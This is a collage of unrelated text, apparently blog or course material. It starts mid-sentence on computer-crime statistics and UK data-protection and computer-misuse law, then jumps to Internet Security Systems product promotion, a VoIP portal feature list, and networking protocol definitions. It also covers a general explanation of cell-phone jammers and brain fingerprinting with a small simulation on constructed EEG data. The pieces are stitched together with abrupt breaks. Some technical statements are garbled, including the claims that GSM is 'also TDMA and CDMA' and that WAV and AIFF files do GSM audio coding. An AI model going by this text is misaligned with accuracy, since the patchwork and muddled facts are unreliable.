compromised and someone's details have been destroyed, manipulated
or used for other means. As a consequence, the last 10 years have seen
the development of many laws that hold and punish those who commit
these computer crimes.
Each year the laws grow stronger, the definitions more exacting, and
the punishments more severe. Chief amongst the targets is the
Computer Hacker, the person who breaks into systems, steals the most
private information and publishes it for all to see.
Just how much computer crime can be attributed to hackers?
According to the Computer Security Institute (1999), these are the types
of computer crime and other losses:
• Human errors - 55%
• Physical security problems - 20% (e.g., natural disasters, power
problems)
• Insider attacks conducted for the purpose of profiting from
computer crime - 10%
• Disgruntled employees seeking revenge - 9%
• Viruses - 4%
• Outsider attacks - 1-3%

Data Protection


The UK Data Protection Act (1984) and the updated 1998 new Data
Protection Act (inspired by a 1995 EU directive) cover the legal aspects
of personal data held by a company and how it may be obtained or
used. They are designed to protect personal privacy and to enable
international free flow of personal data by harmonization. Data users
must register all computerised personal data. The Data Protection
Commissioner enforces this policy.
The Data Protection Act maintains 8 guiding principles; data must be:
• Processed fairly and lawfully (fair collecting principle)
• Obtained and processed for specific purposes
• Adequate, relevant and not excessive
• Accurate and, where necessary, up-to-date
• Kept no longer than necessary
• Processed in accordance with the rights of the data subject

• Kept appropriately secure
• Kept within the EEA, unless protection is adequate

Computer Fraud


The input, alteration, erasure or suppression of computer data or
computer programmes, or other interference with the course of data
processing, that influences the result of data processing thereby causing
economic or possessory loss of property of another person with the
intent of procuring an unlawful economic gain for himself or for
another person, or with the intent to unlawfully deprive that person of
his property.

Computer Forgery

The input, alteration, erasure or suppression of computer data or
computer programmes, or other interference with the course of data
processing, in a manner or under such conditions, as prescribed by
national law, that it would constitute the offence of forgery if it had
been committed with respect to a traditional object of such an offence.

Damage to Computer Data or Computer Programmes

The erasure, damaging, deterioration or suppression of computer data
or computer programmes without right.

Computer Sabotage

The input, alteration, erasure or suppression of computer data or
computer programmes, or interference with computer systems, with
the intent to hinder the functioning of a computer or a
telecommunications system.

Unauthorized Access

The access without right to a computer system or network by infringing
security measures.

Unauthorized Interception

The interception, made without right and by technical means, of
communications to, from and within a computer system or network.
In the United Kingdom, crimes that fall into the above categories are
covered by the UK Computer Misuse Act (1990).


Legal and HR Issues


'The law may not be the most precisely sharpened instrument with which to
strike back at hackers…, but sometimes blunt instruments do an adequate job.'
Introduction
As computer and electronic systems have taken a dominant role in the
way businesses now function, the commercial and the public
perception of electronic crime (often referred to as cyber crime) has
resulted in the development of new laws (both domestic and
international) and the instalment of multiple regulatory bodies.
Legal Issues
To protect both public and private interests, a comprehensive
regulatory environment has been developed to include data protection,
computer misuse, controls on cryptography and software copyright.
Some of the legal issues these regulations are designed to cover include:
• Theft.
• Protection of privacy.
• Freedom of information.
• Fair credit reporting/data protection.
• Public decency.
• Telecommunications.
• Computer crime.
Most developed countries now have a law against computer misuse
whereby viruses, unauthorized access and unauthorized alteration are
treated as a criminal offence. Generally, 'unauthorized' also covers
employees deliberately exceeding their authority. However, the
prosecution has to prove the accused knew they were unauthorized.
International Cyber Crime
International cyber crime is broken down into 6 legal areas:

• Computer Fraud
• Computer Forgery
• Damage to Computer data or Computer Programmes
• Computer Sabotage
• Unauthorized Access
• Unauthorized Interception

ANSA - The Adaptive Network Security Alliance


ANSA brings ISS’ Adaptive Network Security to a wide range of
network management and security products. ANSA delivers the
flexibility of "best-of-breed" products, enhanced enterprise security,
accelerated implementation of enterprise management and security
solutions, and additional value for existing products and services.

Through ANSA, ISS and its technology partners deliver self-correcting
security and management systems that provide maximum value for
organizations with limited IT security resources. ANSA provides
Adaptive Network Security modules for firewalls, virtual private
networks (VPNs), antivirus/malicious code software, public key
infrastructure (PKI) and enterprise systems management (ESM). For
more information, visit the ANSA web site at http://ansa.iss.net, or
send E-mail to ansa@iss.net.

Consulting and Educational Services


ISS’ SAFEsuite delivers years of network security experience in a
structured, easily understood format. ISS increases the value of these
award-winning applications with a full range of professional
consulting services to help each enterprise customer with an
individualized level of care. From overburdened IT staff with limited
network security resources to organizations needing immediate
assistance with a serious breach in security, ISS has experienced
network security professionals ready to assist.

ISS SecureU provides targeted educational programs to meet the needs
of IT security professionals. These programs include courses in the
fundamentals of security and networking, vulnerability management,
threat management and intrusion detection, public key infrastructures,
firewalls, and others. Each course offers the option of certification via
standardized examinations.
Building on the X-Force’s extensive security knowledge, Knowledge
Services offers a range of additional security research and advisory
services. Knowledge Services is a critical element of Internet Security
Systems’ total solution to e-business security.

Security Assessment Services (SAS)

The SAS team provides a comprehensive range of Security Assessments
tailored to fit the requirements of each client. Services range from
secure network architecture and application reviews, through to
penetration testing and Ethical Hacking programs. SAS continues to
prove that the combination of top security consultants, structured
assessment methodologies and utilization of leading edge hacking
developments provide the most detailed security assessment and best
value service currently available on the market.
The SAS consultants are responsible for providing all the information
contained within this Ethical Hacking course and for consistently
keeping it up to date with the leading edge of hacking developments.
Exploit techniques used during our assessments are based on
vulnerability research performed by our renowned X-Force team, and
draw upon extensive security knowledge gathered by our Knowledge
Services.

Security Management Solutions


ISS comprehensive security lifecycle methodology helps e-businesses
focus on their most important security management needs through
standards-based baseline assessments and a full line of consulting,
education and knowledge services offerings.
ISS security management experts work closely with organizations to
establish best-practices strategies for ongoing security management,
and provide outsourced managed security services (MSS). MSS turns a
potential security crisis into achievable security policy, reduced costs
and managed liability. MSS offerings include remote firewall, antivirus,
intrusion detection, PKI/VPN and other security management
essentials. Each installation is backed by ISS’ advanced, standards-based
security lifecycle methodology, and can be paired with e-commerce
insurance for a complete e-business risk management
solution.

The ISS X-Force

X-Force is a senior research and development team of security experts
dedicated to understanding, documenting and coding new
vulnerabilities, attack signatures and global network security solutions.
X-Force professionals work closely with major hardware and software
vendors to uncover and correct potential security problems before they
are discovered and deployed as part of a malicious attack. This
information is regularly integrated into SAFEsuite products, customer
e-mail alerts, and the X-Force online vulnerability database.
Together, SAFEsuite products and the X-Force allow network
administrators to proactively visualize, measure, and analyze real-time
security vulnerabilities and minimize unnecessary exposures to risk.
For more information on the X-Force or to use the X-Force online
knowledge base, please visit the X-Force Web site at
http://xforce.iss.net

RealSecure


RealSecure™ is the industry's first integrated host and network-based
intrusion, misuse, and response system. RealSecure Engines
unobtrusively analyze network traffic, recognizing hostile activity by
interpreting network traffic patterns that indicate attacks. RealSecure
Agents reside on individual hosts, reviewing system logs for evidence
of unauthorized activity.
Upon recognizing a threat, RealSecure reacts immediately with a wide
range of possible responses that include automatically terminating the
connection, sending off alarms or pagers, and recording the attack for
forensic analysis. With RealSecure's distributed architecture and
integration with leading network management systems such as Tivoli
Enterprise and HP OpenView, customers can easily install and manage
RealSecure Engines and Agents throughout their enterprise to stop
internal misuse as well as attacks from outside the network perimeter.

SAFEsuite Decisions

SAFEsuite Decisions is the initial product in a series of new SAFEsuite
Enterprise applications from ISS. It is the first enterprise security
decision-support product that delivers prioritized cross-product
security information to a central location, enabling decision-makers to
take immediate action for ongoing information protection. SAFEsuite
Decisions pulls information from all ISS products, as well as third party
security products, such as firewalls, and provides customers with the
power to quickly understand the state of their security across the
enterprise.

ISS Products


ISS’ award-winning SAFEsuite product line includes:
• Risk Assessment: Internet Scanner, System Scanner, and Database
Scanner
• Intrusion Detection: RealSecure
• Enterprise Security Decision-Support: SAFEsuite Decisions
Internet Scanner
Internet Scanner™ is the market-leading solution for quickly finding
and fixing security holes through automated and comprehensive
network security risk assessment. Internet Scanner scans network
devices to detect vulnerabilities, prioritizes security risks and generates
a wide range of reports ranging from executive-level analysis to
detailed step-by-step instructions for prioritizing and eliminating
security risks.

System Scanner

System Scanner™ is a leading host-based risk assessment and policy
management system. System Scanner helps organizations manage
critical server and enterprise desktop security risks by thoroughly
analyzing internal operating system weaknesses and user activity.
System Scanner also compares an organization's stated security policy
with the actual configuration of the host computer for potential security
risks, including easily guessed passwords, user privileges, file system
access rights, service configurations, and other suspicious activities that
indicate an intrusion.

Database Scanner

ISS' Database Scanner™ is the first risk assessment product engineered
specifically for protecting database applications through security policy
creation, compliance, and enforcement. Database Scanner
automatically identifies potential security exposures in database
systems, ranging from weak passwords to dangerous backdoor
programs.

About Internet Security Systems



How ISS Started
In 1992, Christopher Klaus, a then 19 year-old college student and
computer science guru, invented a ground-breaking technology based
on the need for a security technology that could actively identify and
fix network security weaknesses.
After a tremendous response and continued demand for this new
technology, Christopher founded Internet Security Systems in 1994,
and teamed with software veteran, ISS President and Chief Executive
Officer, Thomas E. Noonan, to launch the company’s first official
commercial product, Internet Scanner™. Today, Internet Scanner
remains a core component of the ISS SAFEsuite product family and the
industry standard for automated security assessment and analysis.
Together, Christopher Klaus and Thomas Noonan launched a company
that would continue on an impressive path of success making an
elegant transition from a private start up to a leading public company
credited with pioneering and leading the field of security management.
Headquartered in Atlanta, Ga., ISS has established a strong global
presence with additional offices throughout North America and
international operations throughout Asia, Australia, Europe, and Latin
America.
Company Growth
ISS has experienced tremendous growth and market acceptance with
more than 1000 employees and over 5,000 customers including 21 of the
25 largest U.S. commercial banks, 9 of the top 10 telecommunications
companies, 68 percent of the Fortune 50, and more than 35 government
agencies worldwide. ISS SAFEsuite solutions play an integral role in
the information protection strategies of leading companies and
organizations in the financial services, technology,
telecommunications, manufacturing, health care and government and
services industries.

Web Portal Features


Call History

Call History gives you a real-time list of all incoming, missed or outgoing calls for all employees on your network. The list also offers the ability to make and return a VoIP call with one click of the mouse, make call notes, read faxes, and listen to voicemails and call recordings.

Call Notes

Make notations of any VoIP calls for future reference.

Click-to-Call In

Allows you to create a link on your website that provides viewers with the option of calling you directly with one click.

Contact Management

Online directory to manage contacts and addresses or initiate a call with one click. Account manager can use this directory to monitor and manage individual user settings and information.

Reporting

Got2VoIP’s service creates history reports of all individual and departmental usage. These can be redistributed to employees.

Speed Dial and Company Directory Phone Integration

Allows you to access your company directory and quick dial directly from the phone.

User Dashboard

Our web-based dashboard provides all the information you need; missed phone, voicemail, fax messages, active call display, and access to the company directory and personal contacts for click-to-call. Available on any PC or laptop with Internet capabilities.

Voicemail and Fax Notifications

Be notified of new voice messages through email or SMS.

Website Widgets

Website Widgets are elements that can be embedded into your website to give added functionality to users. They are designed to direct traffic flow from your website directly to one of your VoIP extensions or departments.

protocol's


A ROUTER is a physical device, or a complex program running on a computer, which forwards data packets from one network to another over a WAN or LAN. Based on routing protocols, a router reads the destination network address of each packet that arrives and then decides to send it via the best route possible, which is based on cost, traffic load, speed, and other factors. Routers usually work at the third level of the protocol stack, while switches and bridges work at the second level of the protocol stack.
VOICE OVER ATM enables a router to carry calls, faxes and other voice traffic over an Asynchronous Transfer Mode network. Voice traffic over an Asynchronous Transfer Mode network is encapsulated via a special method for multiplexed voice.
A WIDE AREA NETWORK or WAN is a communications network used to connect computers and other communication devices using public or private connections.

Protocol's


H.323 PROTOCOL is an overall recommendation that includes references to other network standards like H.225 and H.245 of ITU (International Telecommunication Union), which sets network standards for multimedia communications over packet-based networks that are not able to provide a guaranteed good Quality of Service (QoS).
H.323 PROTOCOL defines various entities, which make possible media and multimedia communications using endpoints, multipoint conferencing units or MCUs, gatekeepers, and gateways and their interaction.
PBX or PRIVATE BRANCH EXCHANGE is a specialized telephone system, which is used in both private and governmental organizations and companies to manage external and internal calls. The advantage of a PBX is that the organization using it does not require a different phone line for each of its phones, and internal calls do not go outside and are not billed.
PULSE CODE MODULATION or PCM converts sound or voice analog signals into digital signals, so that these signals can be processed easily by a digital device, for example, a computer. You also need to use a codec if you want to compress the results for transmissions to occupy lowest possible bandwidth.

Wireless Communication Protocols: GSM, H.323, PBX, PCM, WAN, LAN, Routers

GSM or GLOBAL SYSTEM FOR MOBILE COMMUNICATIONS is a digital cellphone technology that is based on TDMA (Time Division Multiple Access). It is predominantly used in European countries and is also used in other countries of the world, including India. GSM was developed in the 1980s and was distributed to be used in around 7 European countries in 1992. Nowadays, GSM is used in Asia, Europe, Australia, North America, and Chile. GSM operates on the 1.9GHz PCS bands in the USA and on the 900MHz and 1.8GHz bands in Europe. Global System for Mobile Communications defines the entire mobile system and is not just used as a radio interface but also TDMA and CDMA which is Code Division Multiple Access. In the year 2000, the world had more than 250 million GSM users, which represents more than half of the world’s population of cellphone users. GSM use is increasing day by day due to its reliability and easy connectivity services. WAV and AIFF files are used for audio coding of the GSM standard used in IP telephony.

Type “B” Device: INTELLIGENT CELLULAR DISABLERS


Unlike jammers, Type “B” devices do not transmit an interfering signal on the control channels. The device, when located in a designated ‘quiet' area, functions as a ‘detector'. It has a unique identification number for communicating with the cellular base station. When a Type “B” device detects the presence of a mobile phone in the quiet room, the ‘filtering' (i.e. the prevention of authorization of call establishment) is done by the software at the base station.
When the base station sends the signaling transmission to a target user, the device, after simultaneously detecting the presence of that signal and the presence of the target user, signals the base station that the target user is in a ‘quiet' room and that the communication should therefore not be established. Messages can be routed to the user's voice-mail box, if the user subscribes to a voice-mail service. This process of detection and interruption of call establishment is done during the interval normally reserved for signaling and handshaking. For ‘emergency users', the intelligent detector device makes provisions for designated users who have emergency status. These users must pre-register their phone numbers with the service providers. When an incoming call arrives, the detector recognizes that number and the call is established for a specified maximum duration, say two minutes. The emergency users are also allowed to make outgoing calls. Similarly, the system is capable of recognizing and allowing all emergency calls routed to “911”.
It should be noted that the Type “B” detector device being an integral part of the cellular/PCS systems, would need to be provisioned by the cellular/PCS service providers or provisioned by a third-party working cooperatively with full support of the cellular/PCS service providers.

Type "A" Device: JAMMERS



This device overpowers the cell phone's signal with a stronger signal. It comes equipped with several independent oscillators transmitting 'jamming signals' capable of blocking frequencies used by paging devices as well as those used by cellular/PCS systems' control channels for call establishment. When active in a designated area, such devices will (by means of RF interference) prevent all pagers and mobile phones located in that area from receiving and transmitting calls. This type of device transmits only a jamming signal and has very poor frequency selectivity, which leads to interference with a larger amount of communication spectrum than it was originally intended to target. Technologist Jim Mahan said, “There are two types. One is called brute force jamming, which just blocks everything. The problem is, it's like power-washing the airwaves and it bleeds over into the public broadcast area. The other puts out a small amount of interference, and you could potentially confine it within a single cell block. You could use lots of little pockets of small jamming to keep a facility under control.”

Introduction of Mobile Jammer



Jamming devices overpower the cell phone by transmitting a signal on the same frequency as the cell phone and at a high enough power that the two signals collide and cancel each other out. Cell phones are designed to add power if they experience low-level interference, so the jammer must recognize and match the power increase from the phone. Cell phones are full-duplex devices, which means they use two separate frequencies simultaneously, one for talking and one for listening. Some jammers block only one of the frequencies used by cell phones, which has the effect of blocking both. The phone is tricked into thinking there is no service because it can receive only one of the frequencies. Less complex devices block only one group of frequencies, while sophisticated jammers can block several types of networks at once to head off dual-mode or tri-mode phones that automatically switch among different network types to find an open signal. Some of the high-end devices block all frequencies at once and others can be tuned to specific frequencies.
To jam a cell phone, all you need is a device that broadcasts on the correct frequencies. Although different cellular systems process signals differently, all cell-phone networks use radio signals that can be interrupted. GSM, used in digital cellular and PCS-based systems, operates in the 900-MHz and 1800-MHz bands in Europe and Asia and in the 1900-MHz (sometimes referred to as 1.9-GHz) band in the United States. Jammers can broadcast on any frequency and are effective against AMPS, CDMA, TDMA, GSM, PCS, DCS, iDEN and Nextel systems. Old-fashioned analog cell phones and today's digital devices are equally susceptible to jamming. Disrupting a cell phone is the same as jamming any other type of radio communication. A cell phone works by communicating with its service network through a cell tower or base station. Cell towers divide a city into small areas, or cells. As a cell phone user drives down the street, the signal is handed from tower to tower.

A jamming device transmits on the same radio frequencies as the cell phone, disrupting the communication between the phone and the cell-phone base station in the town.
This is called a denial-of-service attack. The jammer denies service of the radio spectrum to the cell-phone users within range of the jamming device. Older jammers sometimes were limited to working on phones using only analog or older digital mobile phone standards. Newer models such as the double and triple band jammers can block all widely used systems (AMPS, iDEN, GSM, etc.) and are even very effective against newer phones which hop to different frequencies and systems when interfered with. As the dominant network technology and frequencies used for mobile phones vary worldwide, some work only in specific regions such as Europe or North America.
The power of the jammer's effect can vary widely based on factors such as proximity to towers, indoor and outdoor settings, and the presence of buildings and landscape; even temperature and humidity play a role. There are concerns that crudely designed jammers may disrupt the functioning of medical devices such as pacemakers. However, like cell phones, most of the devices in common use operate at low enough power output (<1W) to avoid causing any problems.

Mobile Jammer



A GSM jammer, or cell phone jammer, is a device that transmits a signal on the same frequency at which the GSM system operates. Jamming succeeds when the mobile phones in the area where the jammer is located are disabled.
Communication jamming devices were first developed and used by the military. Where tactical commanders use RF communications to exercise control of their forces, an enemy has an interest in those communications. This interest comes from the fundamental area of denying the successful transport of the information from the sender to the receiver.
Nowadays mobile jammer devices and cell phone jammer software are becoming civilian products rather than electronic warfare devices, since with the increasing number of mobile phone users, the need to disable mobile phones in specific places where the ringing of a cell phone would be disruptive has increased. These places include places of worship, university lecture rooms, libraries, concert halls, meeting rooms, and other places where silence is appreciated.

Technique:




The person to be tested wears a special headband with electronic sensors that measure the electroencephalography (EEG) from several locations on the scalp. In order to calibrate the brain fingerprinting system, the testee is presented with a series of irrelevant stimuli, words, and pictures, and a series of relevant stimuli, words, and pictures. The test subject's brain response to these two different types of stimuli allows the tester to determine if the measured brain responses to test stimuli, called probes, are more similar to the relevant or irrelevant responses.
The technique uses the well-known fact that an electrical signal known as P300 is emitted from an individual's brain approximately 300 milliseconds after it is confronted with a stimulus of special significance, e.g. a rare vs. a common stimulus or a stimulus the proband is asked to count. The novel interpretation in brain fingerprinting is to look for P300 as a response to stimuli related to the crime in question, e.g. a murder weapon or a victim's face. Because it is based on EEG signals, the system does not require the testee to issue verbal responses to questions or stimuli.
Brain fingerprinting uses cognitive brain responses; it does not depend on the emotions of the subject, nor is it affected by emotional responses. Brain fingerprinting is fundamentally different from the polygraph (lie-detector), which measures emotion-based physiological signals such as heart rate, sweating, and blood pressure. Also, unlike polygraph testing, it does not attempt to determine whether or not the subject is lying or telling the truth.
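
The calibrate-then-compare step described above, as an added example that is not part of the original post. It runs on constructed EEG epochs (the sampling rate, amplitudes, noise level and trial count are assumptions) and uses a squared-distance comparison of trial averages as a stand-in for the similarity measure, which the page does not specify.

```python
import math
import random

FS = 100        # assumed sampling rate in Hz (not from the page)
EPOCH_MS = 800  # assumed epoch length after stimulus onset

def synth_epoch(rng, p300_uv):
    """Constructed single-trial epoch: noise plus an optional bump near 300 ms."""
    samples = []
    for i in range(FS * EPOCH_MS // 1000):
        t_ms = i * 1000 / FS
        bump = p300_uv * math.exp(-((t_ms - 300) / 60) ** 2)
        samples.append(bump + rng.gauss(0, 5))  # 5 uV noise is an assumption
    return samples

def average(epochs):
    """Average across trials: noise shrinks, the evoked response remains."""
    return [sum(col) / len(col) for col in zip(*epochs)]

def sq_distance(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b))

def classify(relevant, irrelevant, probes):
    """Say which calibration average the probe average is closer to."""
    rel, irr, pro = average(relevant), average(irrelevant), average(probes)
    d_rel, d_irr = sq_distance(pro, rel), sq_distance(pro, irr)
    label = "relevant-like" if d_rel < d_irr else "irrelevant-like"
    return label, d_rel, d_irr

def run_subject(seed, recognises_probes, trials=40):
    """Simulate one session; all signals here are constructed, not real EEG."""
    rng = random.Random(seed)
    relevant = [synth_epoch(rng, 10) for _ in range(trials)]
    irrelevant = [synth_epoch(rng, 0) for _ in range(trials)]
    probe_amp = 10 if recognises_probes else 0
    probes = [synth_epoch(rng, probe_amp) for _ in range(trials)]
    return classify(relevant, irrelevant, probes)

if __name__ == "__main__":
    for knows in (True, False):
        label, d_rel, d_irr = run_subject(seed=1, recognises_probes=knows)
        print(f"recognises={knows}: {label} (d_rel={d_rel:.0f}, d_irr={d_irr:.0f})")
```

Single trials are too noisy to compare directly, which is why the comparison is made on averages over many presentations of each stimulus type.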

Brain Fingerprinting




Brain Fingerprinting is designed to determine whether an individual recognizes specific information related to an event or activity by measuring electrical brain wave responses to words, phrases, or pictures presented on a computer screen. The technique can be applied only in situations where investigators have a sufficient amount of specific information about an event or activity that would be known only to the perpetrator and investigator. In this respect, Brain Fingerprinting is considered a type of Guilty Knowledge Test, where the "guilty" party is expected to react strongly to the relevant detail of the event or activity.

Existing (polygraph) procedures for assessing the validity of a suspect's "guilty" knowledge rely on measurement of autonomic arousal (e.g., palm sweating and heart rate), while Brain Fingerprinting measures electrical brain activity via a fitted headband containing special sensors. Brain Fingerprinting is said to be more accurate in detecting "guilty" knowledge distinct from the false positives of traditional polygraph methods, but this is hotly disputed by specialized researchers.